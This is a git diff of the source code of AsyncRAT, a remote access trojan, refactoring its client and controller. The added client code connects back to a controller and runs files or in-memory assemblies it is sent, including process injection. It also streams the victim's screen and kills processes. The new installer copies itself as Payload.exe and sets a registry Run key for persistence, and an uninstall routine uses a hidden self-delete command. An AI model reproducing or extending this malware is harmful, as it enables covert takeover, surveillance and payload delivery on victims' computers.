diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs
index f29f577..4240dc7 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs
@@ -45,11 +45,11 @@
this.sENDFILEToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.sENDFILETOMEMORYToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.rEMOTEDESKTOPToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
+ this.pROCESSMANAGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.statusStrip1 = new System.Windows.Forms.StatusStrip();
this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel();
this.ping = new System.Windows.Forms.Timer(this.components);
this.UpdateUI = new System.Windows.Forms.Timer(this.components);
- this.pROCESSMANAGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.contextMenuStrip1.SuspendLayout();
this.statusStrip1.SuspendLayout();
this.SuspendLayout();
@@ -68,6 +68,8 @@
this.listView1.GridLines = true;
this.listView1.Location = new System.Drawing.Point(0, 0);
this.listView1.Name = "listView1";
+ this.listView1.ShowGroups = false;
+ this.listView1.ShowItemToolTips = true;
this.listView1.Size = new System.Drawing.Size(915, 342);
this.listView1.TabIndex = 0;
this.listView1.UseCompatibleStateImageBehavior = false;
@@ -107,7 +109,7 @@
this.rEMOTEDESKTOPToolStripMenuItem,
this.pROCESSMANAGERToolStripMenuItem});
this.contextMenuStrip1.Name = "contextMenuStrip1";
- this.contextMenuStrip1.Size = new System.Drawing.Size(275, 223);
+ this.contextMenuStrip1.Size = new System.Drawing.Size(275, 190);
//
// cLIENTOPTIONSToolStripMenuItem
//
@@ -173,6 +175,13 @@
this.rEMOTEDESKTOPToolStripMenuItem.Text = "REMOTE DESKTOP";
this.rEMOTEDESKTOPToolStripMenuItem.Click += new System.EventHandler(this.rEMOTEDESKTOPToolStripMenuItem_Click);
//
+ // pROCESSMANAGERToolStripMenuItem
+ //
+ this.pROCESSMANAGERToolStripMenuItem.Name = "pROCESSMANAGERToolStripMenuItem";
+ this.pROCESSMANAGERToolStripMenuItem.Size = new System.Drawing.Size(274, 30);
+ this.pROCESSMANAGERToolStripMenuItem.Text = "PROCESS MANAGER";
+ this.pROCESSMANAGERToolStripMenuItem.Click += new System.EventHandler(this.pROCESSMANAGERToolStripMenuItem_Click);
+ //
// statusStrip1
//
this.statusStrip1.ImageScalingSize = new System.Drawing.Size(24, 24);
@@ -202,13 +211,6 @@
this.UpdateUI.Interval = 1000;
this.UpdateUI.Tick += new System.EventHandler(this.UpdateUI_Tick);
//
- // pROCESSMANAGERToolStripMenuItem
- //
- this.pROCESSMANAGERToolStripMenuItem.Name = "pROCESSMANAGERToolStripMenuItem";
- this.pROCESSMANAGERToolStripMenuItem.Size = new System.Drawing.Size(274, 30);
- this.pROCESSMANAGERToolStripMenuItem.Text = "PROCESS MANAGER";
- this.pROCESSMANAGERToolStripMenuItem.Click += new System.EventHandler(this.pROCESSMANAGERToolStripMenuItem_Click);
- //
// Form1
//
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandlePacket.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandlePacket.cs
index 944f169..77ee894 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandlePacket.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandlePacket.cs
@@ -31,6 +31,7 @@ namespace AsyncRAT_Sharp.Handle_Packet
Client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("HWID").AsString);
Client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("User").AsString);
Client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("OS").AsString);
+ Client.LV.ToolTipText = unpack_msgpack.ForcePathObject("Path").AsString;
Client.ID = unpack_msgpack.ForcePathObject("HWID").AsString;
Program.form1.listView1.Items.Insert(0, Client.LV);
Settings.Online.Add(Client);
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Settings.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Settings.Designer.cs
index f347e77..a5a5846 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Settings.Designer.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Settings.Designer.cs
@@ -8,21 +8,17 @@
//
//------------------------------------------------------------------------------
-namespace AsyncRAT_Sharp.Properties
-{
-
-
+namespace AsyncRAT_Sharp.Properties {
+
+
[global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
- [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0")]
- internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase
- {
-
+ [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "15.9.0.0")]
+ internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase {
+
private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings())));
-
- public static Settings Default
- {
- get
- {
+
+ public static Settings Default {
+ get {
return defaultInstance;
}
}
diff --git a/AsyncRAT-C#/Client/Client.csproj b/AsyncRAT-C#/Client/Client.csproj
index d2fdb16..c776881 100644
--- a/AsyncRAT-C#/Client/Client.csproj
+++ b/AsyncRAT-C#/Client/Client.csproj
@@ -11,6 +11,7 @@
v4.0
512
true
+ Client
x86
@@ -47,6 +48,9 @@
+
+
+
@@ -54,6 +58,7 @@
+
@@ -85,6 +90,8 @@
-
+
+
+
\ No newline at end of file
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandlePacket.cs b/AsyncRAT-C#/Client/Handle Packet/HandlePacket.cs
new file mode 100644
index 0000000..02265eb
--- /dev/null
+++ b/AsyncRAT-C#/Client/Handle Packet/HandlePacket.cs
@@ -0,0 +1,294 @@
+using Client.MessagePack;
+using Client.Sockets;
+using StreamLibrary;
+using StreamLibrary.UnsafeCodecs;
+using System;
+using System.Diagnostics;
+using System.Drawing;
+using System.Drawing.Imaging;
+using System.IO;
+using System.Linq;
+using System.Management;
+using System.Net.Sockets;
+using System.Reflection;
+using System.Runtime.InteropServices;
+using System.Text;
+using System.Threading;
+using System.Windows.Forms;
+
+namespace Client.Handle_Packet
+{
+ class HandlePacket
+ {
+ /// Handle the packet
+ public static void Read(object Data)
+ {
+ try
+ {
+ MsgPack unpack_msgpack = new MsgPack();
+ unpack_msgpack.DecodeFromBytes((byte[])Data);
+ switch (unpack_msgpack.ForcePathObject("Packet").AsString)
+ {
+ case "sendMessage":
+ {
+ MessageBox.Show(unpack_msgpack.ForcePathObject("Message").AsString);
+ }
+ break;
+
+ case "Ping":
+ {
+ Debug.WriteLine("Server Pinged me " + unpack_msgpack.ForcePathObject("Message").AsString);
+ }
+ break;
+
+ case "sendFile":
+ {
+ Received();
+ string FullPath = Path.GetTempFileName() + unpack_msgpack.ForcePathObject("Extension").AsString;
+ unpack_msgpack.ForcePathObject("File").SaveBytesToFile(FullPath);
+ Process.Start(FullPath);
+ if (unpack_msgpack.ForcePathObject("Update").AsString == "true")
+ {
+ Uninstall();
+ }
+ }
+ break;
+
+ case "sendMemory":
+ {
+ Received();
+ byte[] Buffer = unpack_msgpack.ForcePathObject("File").GetAsBytes();
+ string Injection = unpack_msgpack.ForcePathObject("Inject").AsString;
+ byte[] Plugin = unpack_msgpack.ForcePathObject("Plugin").GetAsBytes();
+ object[] parameters = new object[] { Buffer, Injection, Plugin };
+ Thread thread = null;
+ if (Injection.Length == 0)
+ {
+ thread = new Thread(new ParameterizedThreadStart(SendToMemory));
+ }
+ else
+ {
+ thread = new Thread(new ParameterizedThreadStart(RunPE));
+ }
+ thread.Start(parameters);
+ }
+ break;
+
+ case "close":
+ {
+ try
+ {
+ ClientSocket.Client.Shutdown(SocketShutdown.Both);
+ }
+ catch { }
+ Environment.Exit(0);
+ }
+ break;
+
+ case "uninstall":
+ {
+ Uninstall();
+ }
+ break;
+
+ case "remoteDesktop":
+ {
+ switch (unpack_msgpack.ForcePathObject("Option").AsString)
+ {
+ case "false":
+ {
+ RemoteDesktop_Status = false;
+ }
+ break;
+
+ case "true":
+ {
+ RemoteDesktop_Status = true;
+ RemoteDesktop();
+ }
+ break;
+ }
+ }
+ break;
+
+ case "processManager":
+ {
+ switch (unpack_msgpack.ForcePathObject("Option").AsString)
+ {
+ case "List":
+ {
+ ProcessManager();
+ }
+ break;
+
+ case "Kill":
+ {
+ ProcessKill(Convert.ToInt32(unpack_msgpack.ForcePathObject("ID").AsString));
+ }
+ break;
+ }
+ }
+ break;
+ }
+ }
+ catch { }
+ }
+
+ private static void Received()
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "Received";
+ ClientSocket.BeginSend(msgpack.Encode2Bytes());
+ }
+
+ private static void ProcessKill(int ID)
+ {
+ foreach (var process in Process.GetProcesses())
+ {
+ try
+ {
+ if (process.Id == ID)
+ {
+ process.Kill();
+ }
+ }
+ catch { };
+ }
+ ProcessManager();
+ }
+
+ private static void ProcessManager()
+ {
+ StringBuilder sb = new StringBuilder();
+ var query = "SELECT ProcessId, Name, ExecutablePath FROM Win32_Process";
+ using (var searcher = new ManagementObjectSearcher(query))
+ using (var results = searcher.Get())
+ {
+ var processes = results.Cast().Select(x => new
+ {
+ ProcessId = (UInt32)x["ProcessId"],
+ Name = (string)x["Name"],
+ ExecutablePath = (string)x["ExecutablePath"]
+ });
+ foreach (var p in processes)
+ {
+ if (File.Exists(p.ExecutablePath))
+ {
+ string name = p.ExecutablePath;
+ string key = p.ProcessId.ToString();
+ Icon icon = Icon.ExtractAssociatedIcon(p.ExecutablePath);
+ Bitmap bmpIcon = icon.ToBitmap();
+ using (MemoryStream ms = new MemoryStream())
+ {
+ bmpIcon.Save(ms, ImageFormat.Png);
+ sb.Append(name + "-=>" + key + "-=>" + Convert.ToBase64String(ms.ToArray()) + "-=>");
+ }
+ }
+ }
+ }
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "processManager";
+ msgpack.ForcePathObject("Message").AsString = sb.ToString();
+ ClientSocket.BeginSend(msgpack.Encode2Bytes());
+ }
+
+ private static bool RemoteDesktop_Status { get; set; }
+ private static void RemoteDesktop()
+ {
+ try
+ {
+ IUnsafeCodec unsafeCodec = new UnsafeStreamCodec(80);
+ while (RemoteDesktop_Status == true)
+ {
+ Thread.Sleep(1);
+ if (!ClientSocket.Client.Connected) break;
+ Bitmap bmp = CaptureScreen();
+ Rectangle rect = new Rectangle(0, 0, bmp.Width, bmp.Height);
+ Size size = new Size(bmp.Width, bmp.Height);
+ BitmapData bmpData = bmp.LockBits(new Rectangle(0, 0, bmp.Width, bmp.Height), ImageLockMode.ReadWrite, bmp.PixelFormat);
+
+ using (MemoryStream stream = new MemoryStream(1000000))
+ {
+ unsafeCodec.CodeImage(bmpData.Scan0, rect, size, bmp.PixelFormat, stream);
+ if (stream.Length > 0)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "remoteDesktop";
+ msgpack.ForcePathObject("Stream").SetAsBytes(stream.ToArray());
+ ClientSocket.BeginSend(msgpack.Encode2Bytes());
+ }
+ }
+ bmp.UnlockBits(bmpData);
+ bmp.Dispose();
+ }
+ }
+ catch { }
+ }
+
+ private static Bitmap CaptureScreen()
+ {
+ Rectangle rect = Screen.AllScreens[0].WorkingArea;
+ try
+ {
+ Bitmap bmpScreenshot = new Bitmap(rect.Width, rect.Height, PixelFormat.Format32bppArgb);
+ Graphics gfxScreenshot = Graphics.FromImage(bmpScreenshot);
+ gfxScreenshot.CopyFromScreen(0, 0, 0, 0, new Size(bmpScreenshot.Width, bmpScreenshot.Height), CopyPixelOperation.SourceCopy);
+ gfxScreenshot.Dispose();
+ return bmpScreenshot;
+ }
+ catch { return new Bitmap(rect.Width, rect.Height); }
+ }
+
+
+ private static void Uninstall()
+ {
+ ProcessStartInfo Del = null;
+ try
+ {
+ Del = new ProcessStartInfo()
+ {
+ Arguments = "/C choice /C Y /N /D Y /T 1 & Del " + Process.GetCurrentProcess().MainModule.FileName,
+ WindowStyle = ProcessWindowStyle.Hidden,
+ CreateNoWindow = true,
+ FileName = "cmd.exe"
+ };
+
+ ClientSocket.Client.Shutdown(SocketShutdown.Both);
+ ClientSocket.Client.Close();
+ }
+ catch { }
+ finally
+ {
+ Process.Start(Del);
+ Environment.Exit(0);
+ }
+ }
+
+ private static void SendToMemory(object obj)
+ {
+ object[] Obj = (object[])obj;
+ byte[] Buffer = (byte[])Obj[0];
+ Assembly Loader = Assembly.Load(Buffer);
+ object[] Parameters = null;
+ if (Loader.EntryPoint.GetParameters().Length > 0)
+ {
+ Parameters = new object[] { new string[] { null } };
+ }
+ Loader.EntryPoint.Invoke(null, Parameters);
+ }
+
+ private static void RunPE(object obj)
+ {
+ try
+ {
+ object[] Parameters = (object[])obj;
+ byte[] File = (byte[])Parameters[0];
+ string Injection = Convert.ToString(Parameters[1]);
+ byte[] Plugin = (byte[])Parameters[2];
+ Assembly Loader = Assembly.Load(Plugin);
+ Loader.GetType("Plugin.Program").GetMethod("Run").Invoke(null, new object[] { File, Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), Injection) });
+ }
+ catch { }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Client/Install/HiddenStartup.cs b/AsyncRAT-C#/Client/Install/HiddenStartup.cs
new file mode 100644
index 0000000..46f455d
--- /dev/null
+++ b/AsyncRAT-C#/Client/Install/HiddenStartup.cs
@@ -0,0 +1,11 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+
+namespace Client.Install
+{
+ class HiddenStartup
+ {
+ }
+}
diff --git a/AsyncRAT-C#/Client/Install/NormalStartup.cs b/AsyncRAT-C#/Client/Install/NormalStartup.cs
new file mode 100644
index 0000000..c12c746
--- /dev/null
+++ b/AsyncRAT-C#/Client/Install/NormalStartup.cs
@@ -0,0 +1,50 @@
+using Microsoft.Win32;
+using System;
+using System.Diagnostics;
+using System.IO;
+
+namespace Client.Install
+{
+ class NormalStartup
+ {
+ public static void Install()
+ {
+ try
+ {
+ if (Process.GetCurrentProcess().MainModule.FileName != Settings.ClientFullPath)
+ {
+ foreach (Process P in Process.GetProcesses())
+ {
+ try
+ {
+ if (P.MainModule.FileName == Settings.ClientFullPath)
+ P.Kill();
+ }
+ catch
+ {
+ Debug.WriteLine("NormalStartup Error : " + P.ProcessName);
+ }
+ }
+
+ FileStream Drop;
+ if (File.Exists(Settings.ClientFullPath))
+ Drop = new FileStream(Settings.ClientFullPath, FileMode.Create);
+ else
+ Drop = new FileStream(Settings.ClientFullPath, FileMode.CreateNew);
+ byte[] Client = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName);
+ Drop.Write(Client, 0, Client.Length);
+ Drop.Dispose();
+
+ Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").SetValue(Path.GetFileName(Settings.ClientFullPath), Settings.ClientFullPath);
+ Process.Start(Settings.ClientFullPath);
+ Environment.Exit(0);
+ }
+ }
+ catch (Exception ex)
+ {
+ Debug.WriteLine("Install Failed : " + ex.Message);
+ }
+ }
+
+ }
+}
diff --git a/AsyncRAT-C#/Client/MessagePack/BytesTools.cs b/AsyncRAT-C#/Client/MessagePack/BytesTools.cs
index 8ca0275..0397228 100644
--- a/AsyncRAT-C#/Client/MessagePack/BytesTools.cs
+++ b/AsyncRAT-C#/Client/MessagePack/BytesTools.cs
@@ -4,7 +4,7 @@ using System.Linq;
using System.Text;
using System.Threading.Tasks;
-namespace AsyncRAT_Sharp.MessagePack
+namespace Client.MessagePack
{
public class BytesTools
{
diff --git a/AsyncRAT-C#/Client/MessagePack/MsgPack.cs b/AsyncRAT-C#/Client/MessagePack/MsgPack.cs
index 3484eed..92e0df3 100644
--- a/AsyncRAT-C#/Client/MessagePack/MsgPack.cs
+++ b/AsyncRAT-C#/Client/MessagePack/MsgPack.cs
@@ -17,7 +17,7 @@ using System.Text;
using System.Threading.Tasks;
-namespace AsyncRAT_Sharp.MessagePack
+namespace Client.MessagePack
{
public class MsgPackEnum : IEnumerator
{
diff --git a/AsyncRAT-C#/Client/MessagePack/MsgPackType.cs b/AsyncRAT-C#/Client/MessagePack/MsgPackType.cs
index 8a47d25..b0ca5eb 100644
--- a/AsyncRAT-C#/Client/MessagePack/MsgPackType.cs
+++ b/AsyncRAT-C#/Client/MessagePack/MsgPackType.cs
@@ -4,7 +4,7 @@ using System.Linq;
using System.Text;
using System.Threading.Tasks;
-namespace AsyncRAT_Sharp.MessagePack
+namespace Client.MessagePack
{
public enum MsgPackType
{
diff --git a/AsyncRAT-C#/Client/MessagePack/ReadTools.cs b/AsyncRAT-C#/Client/MessagePack/ReadTools.cs
index 274fef2..5782829 100644
--- a/AsyncRAT-C#/Client/MessagePack/ReadTools.cs
+++ b/AsyncRAT-C#/Client/MessagePack/ReadTools.cs
@@ -5,7 +5,7 @@ using System.Linq;
using System.Text;
using System.Threading.Tasks;
-namespace AsyncRAT_Sharp.MessagePack
+namespace Client.MessagePack
{
class ReadTools
{
diff --git a/AsyncRAT-C#/Client/MessagePack/WriteTools.cs b/AsyncRAT-C#/Client/MessagePack/WriteTools.cs
index 19414a3..1c6cd5e 100644
--- a/AsyncRAT-C#/Client/MessagePack/WriteTools.cs
+++ b/AsyncRAT-C#/Client/MessagePack/WriteTools.cs
@@ -1,11 +1,7 @@
using System;
-using System.Collections.Generic;
using System.IO;
-using System.Linq;
-using System.Text;
-using System.Threading.Tasks;
-namespace AsyncRAT_Sharp.MessagePack
+namespace Client.MessagePack
{
class WriteTools
{
diff --git a/AsyncRAT-C#/Client/Program.cs b/AsyncRAT-C#/Client/Program.cs
index f8860bc..311040a 100644
--- a/AsyncRAT-C#/Client/Program.cs
+++ b/AsyncRAT-C#/Client/Program.cs
@@ -1,22 +1,8 @@
-using AsyncRAT_Sharp.MessagePack;
-using Microsoft.VisualBasic;
-using Microsoft.VisualBasic.Devices;
-using System;
-using System.Diagnostics;
+using System.Threading;
+using Client.Sockets;
using System.IO;
-using System.Net.Sockets;
-using System.Text;
-using System.Threading;
-using System.Windows.Forms;
-using System.Reflection;
-using System.Runtime.InteropServices;
-using System.Security.Cryptography;
-using StreamLibrary;
-using StreamLibrary.UnsafeCodecs;
-using System.Drawing;
-using System.Drawing.Imaging;
-using System.Management;
-using System.Linq;
+using System;
+using Client.Install;
// │ Author : NYAN CAT
// │ Name : AsyncRAT // Simple Socket
@@ -34,495 +20,25 @@ namespace Client
public static readonly string IP = "127.0.0.1";
public static readonly int Port = 6606;
public static readonly string Version = "0.2.3";
+ public static readonly string ClientFullPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData), "Payload.exe");
}
/// The Main Class
/// Contains all methods for socket and reading the packets
class Program
{
- public static Socket Client { get; set; }
- private static byte[] Buffer { get; set; }
- private static long Buffersize { get; set; }
- private static bool BufferRecevied { get; set; }
- private static System.Threading.Timer Tick { get; set; }
- private static MemoryStream MS { get; set; }
- private static object SendSync { get; set; }
+
static void Main(string[] args)
{
- InitializeClient();
+ NormalStartup.Install();
+
+ ClientSocket.InitializeClient();
+
while (true)
{
Thread.Sleep(1000);
}
- }
-
- /// Initialization variables and connect to socket.
- public static void InitializeClient()
- {
- try
- {
- Client = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
- {
- ReceiveBufferSize = 50 * 1024,
- SendBufferSize = 50 * 1024,
- ReceiveTimeout = -1,
- SendTimeout = -1,
- };
- Client.Connect(Settings.IP, Settings.Port);
- Debug.WriteLine("Connected!");
- Buffer = new byte[1];
- Buffersize = 0;
- BufferRecevied = false;
- MS = new MemoryStream();
- SendSync = new object();
- BeginSend(SendInfo());
- TimerCallback T = Ping;
- Tick = new System.Threading.Timer(T, null, new Random().Next(30 * 1000, 60 * 1000), new Random().Next(30 * 1000, 60 * 1000));
- Client.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, ReadServertData, null);
- }
- catch
- {
- Debug.WriteLine("Disconnected!");
- Thread.Sleep(new Random().Next(1 * 1000, 6 * 1000));
- Reconnect();
- }
- }
-
- /// Cleanup everything and start to connect again.
- public static void Reconnect()
- {
- if (Client.Connected) return;
-
- Tick?.Dispose();
-
- try
- {
- Client?.Close();
- Client?.Dispose();
- }
- catch { }
-
- MS?.Dispose();
-
- InitializeClient();
- }
-
- /// Method to send our ID to server's listview.
- private static byte[] SendInfo()
- {
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "ClientInfo";
- msgpack.ForcePathObject("HWID").AsString = HWID();
- msgpack.ForcePathObject("User").AsString = Environment.UserName.ToString();
- msgpack.ForcePathObject("OS").AsString = new ComputerInfo().OSFullName.ToString() + " " + Environment.Is64BitOperatingSystem.ToString().Replace("True", "64bit").Replace("False", "32bit");
- return msgpack.Encode2Bytes();
- }
-
- private static string HWID()
- {
- StringBuilder sb = new StringBuilder();
- sb.Append(Environment.UserDomainName);
- sb.Append(Environment.UserName);
- sb.Append(Environment.MachineName);
- sb.Append(Environment.Version);
- return GetHash(sb.ToString());
- }
-
- private static string GetHash(string strToHash)
- {
- MD5CryptoServiceProvider md5Obj = new MD5CryptoServiceProvider();
- byte[] bytesToHash = Encoding.ASCII.GetBytes(strToHash);
- bytesToHash = md5Obj.ComputeHash(bytesToHash);
- StringBuilder strResult = new StringBuilder();
- foreach (byte b in bytesToHash)
- strResult.Append(b.ToString("x2"));
- return strResult.ToString().Substring(0, 12).ToUpper();
- }
-
- /// get the length of the buffer by reading byte by byte [1]
- /// until we get the full size.
- public static void ReadServertData(IAsyncResult ar)
- {
- try
- {
- if (Client.Connected == false)
- {
- Reconnect();
- return;
- }
-
- int Recevied = Client.EndReceive(ar);
-
- if (Recevied > 0)
- {
-
- if (BufferRecevied == false)
- {
- if (Buffer[0] == 0)
- {
- Buffersize = Convert.ToInt64(Encoding.UTF8.GetString(MS.ToArray()));
- Debug.WriteLine("/// Buffersize: " + Buffersize.ToString() + "Bytes ///");
- MS.Dispose();
- MS = new MemoryStream();
- if (Buffersize > 0)
- {
- Buffer = new byte[Buffersize - 1];
- BufferRecevied = true;
- }
- }
- else
- {
- MS.Write(Buffer, 0, Buffer.Length);
- }
- }
- else
- {
- MS.Write(Buffer, 0, Recevied);
- if (MS.Length == Buffersize)
- {
- ThreadPool.QueueUserWorkItem(Read, MS.ToArray());
- MS.Dispose();
- MS = new MemoryStream();
- Buffer = new byte[1];
- Buffersize = 0;
- BufferRecevied = false;
- }
- else
- {
- Buffer = new byte[Buffersize - MS.Length];
- }
- }
- Client.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, ReadServertData, null);
- }
- else
- {
- Reconnect();
- }
- }
- catch
- {
- Reconnect();
- }
- }
-
- /// Handle the packet
- public static void Read(object Data)
- {
- try
- {
- MsgPack unpack_msgpack = new MsgPack();
- unpack_msgpack.DecodeFromBytes((byte[])Data);
- switch (unpack_msgpack.ForcePathObject("Packet").AsString)
- {
- case "sendMessage":
- {
- MessageBox.Show(unpack_msgpack.ForcePathObject("Message").AsString);
- }
- break;
-
- case "Ping":
- {
- Debug.WriteLine("Server Pinged me " + unpack_msgpack.ForcePathObject("Message").AsString);
- }
- break;
-
- case "sendFile":
- {
- Received();
- string FullPath = Path.GetTempFileName() + unpack_msgpack.ForcePathObject("Extension").AsString;
- unpack_msgpack.ForcePathObject("File").SaveBytesToFile(FullPath);
- Process.Start(FullPath);
- if (unpack_msgpack.ForcePathObject("Update").AsString == "true")
- {
- Uninstall();
- }
- }
- break;
-
- case "sendMemory":
- {
- Received();
- byte[] Buffer = unpack_msgpack.ForcePathObject("File").GetAsBytes();
- string Injection = unpack_msgpack.ForcePathObject("Inject").AsString;
- byte[] Plugin = unpack_msgpack.ForcePathObject("Plugin").GetAsBytes();
- object[] parameters = new object[] { Buffer, Injection, Plugin };
- Thread thread = null;
- if (Injection.Length == 0)
- {
- thread = new Thread(new ParameterizedThreadStart(SendToMemory));
- }
- else
- {
- thread = new Thread(new ParameterizedThreadStart(RunPE));
- }
- thread.Start(parameters);
- }
- break;
-
- case "close":
- {
- try
- {
- Client.Shutdown(SocketShutdown.Both);
- }
- catch { }
- Environment.Exit(0);
- }
- break;
-
- case "uninstall":
- {
- Uninstall();
- }
- break;
-
- case "remoteDesktop":
- {
- switch (unpack_msgpack.ForcePathObject("Option").AsString)
- {
- case "false":
- {
- RemoteDesktop_Status = false;
- }
- break;
-
- case "true":
- {
- RemoteDesktop_Status = true;
- RemoteDesktop();
- }
- break;
- }
- }
- break;
-
- case "processManager":
- {
- switch (unpack_msgpack.ForcePathObject("Option").AsString)
- {
- case "List":
- {
- ProcessManager();
- }
- break;
-
- case "Kill":
- {
- ProcessKill(Convert.ToInt32(unpack_msgpack.ForcePathObject("ID").AsString));
- }
- break;
- }
- }
- break;
- }
- }
- catch { }
- }
-
- private static void Received()
- {
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "Received";
- BeginSend(msgpack.Encode2Bytes());
- }
-
- private static void ProcessKill(int ID)
- {
- foreach (var process in Process.GetProcesses())
- {
- try
- {
- if (process.Id == ID)
- {
- process.Kill();
- }
- }
- catch { };
- }
- ProcessManager();
- }
-
- private static void ProcessManager()
- {
- StringBuilder sb = new StringBuilder();
- var query = "SELECT ProcessId, Name, ExecutablePath FROM Win32_Process";
- using (var searcher = new ManagementObjectSearcher(query))
- using (var results = searcher.Get())
- {
- var processes = results.Cast().Select(x => new
- {
- ProcessId = (UInt32)x["ProcessId"],
- Name = (string)x["Name"],
- ExecutablePath = (string)x["ExecutablePath"]
- });
- foreach (var p in processes)
- {
- if (File.Exists(p.ExecutablePath))
- {
- string name = p.ExecutablePath;
- string key = p.ProcessId.ToString();
- Icon icon = Icon.ExtractAssociatedIcon(p.ExecutablePath);
- Bitmap bmpIcon = icon.ToBitmap();
- using (MemoryStream ms = new MemoryStream())
- {
- bmpIcon.Save(ms, ImageFormat.Png);
- sb.Append(name + "-=>" + key + "-=>" + Convert.ToBase64String(ms.ToArray()) + "-=>");
- }
- }
- }
- }
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "processManager";
- msgpack.ForcePathObject("Message").AsString = sb.ToString();
- BeginSend(msgpack.Encode2Bytes());
- }
-
- private static bool RemoteDesktop_Status { get; set; }
- private static void RemoteDesktop()
- {
- try
- {
- IUnsafeCodec unsafeCodec = new UnsafeStreamCodec(80);
- while (RemoteDesktop_Status == true)
- {
- Thread.Sleep(1);
- if (!Client.Connected) break;
- Bitmap bmp = CaptureScreen();
- Rectangle rect = new Rectangle(0, 0, bmp.Width, bmp.Height);
- Size size = new Size(bmp.Width, bmp.Height);
- BitmapData bmpData = bmp.LockBits(new Rectangle(0, 0, bmp.Width, bmp.Height), ImageLockMode.ReadWrite, bmp.PixelFormat);
-
- using (MemoryStream stream = new MemoryStream(1000000))
- {
- unsafeCodec.CodeImage(bmpData.Scan0, rect, size, bmp.PixelFormat, stream);
- if (stream.Length > 0)
- {
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "remoteDesktop";
- msgpack.ForcePathObject("Stream").SetAsBytes(stream.ToArray());
- BeginSend(msgpack.Encode2Bytes());
- }
- }
- bmp.UnlockBits(bmpData);
- bmp.Dispose();
- }
- }
- catch { }
- }
-
- private static Bitmap CaptureScreen()
- {
- Rectangle rect = Screen.AllScreens[0].WorkingArea;
- try
- {
- Bitmap bmpScreenshot = new Bitmap(rect.Width, rect.Height, PixelFormat.Format32bppArgb);
- Graphics gfxScreenshot = Graphics.FromImage(bmpScreenshot);
- gfxScreenshot.CopyFromScreen(0, 0, 0, 0, new Size(bmpScreenshot.Width, bmpScreenshot.Height), CopyPixelOperation.SourceCopy);
- gfxScreenshot.Dispose();
- return bmpScreenshot;
- }
- catch { return new Bitmap(rect.Width, rect.Height); }
- }
-
-
- private static void Uninstall()
- {
- ProcessStartInfo Del = null;
- try
- {
- Del = new ProcessStartInfo()
- {
- Arguments = "/C choice /C Y /N /D Y /T 1 & Del " + Process.GetCurrentProcess().MainModule.FileName,
- WindowStyle = ProcessWindowStyle.Hidden,
- CreateNoWindow = true,
- FileName = "cmd.exe"
- };
-
- Client.Shutdown(SocketShutdown.Both);
- Client.Close();
- }
- catch { }
- finally
- {
- Process.Start(Del);
- Environment.Exit(0);
- }
- }
-
- private static void SendToMemory(object obj)
- {
- object[] Obj = (object[])obj;
- byte[] Buffer = (byte[])Obj[0];
- Assembly Loader = Assembly.Load(Buffer);
- object[] Parameters = null;
- if (Loader.EntryPoint.GetParameters().Length > 0)
- {
- Parameters = new object[] { new string[] { null } };
- }
- Loader.EntryPoint.Invoke(null, Parameters);
- }
-
- private static void RunPE(object obj)
- {
- try
- {
- object[] Parameters = (object[])obj;
- byte[] File = (byte[])Parameters[0];
- string Injection = Convert.ToString(Parameters[1]);
- byte[] Plugin = (byte[])Parameters[2];
- Assembly Loader = Assembly.Load(Plugin);
- Loader.GetType("Plugin.Program").GetMethod("Run").Invoke(null, new object[] { File, Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), Injection) });
- }
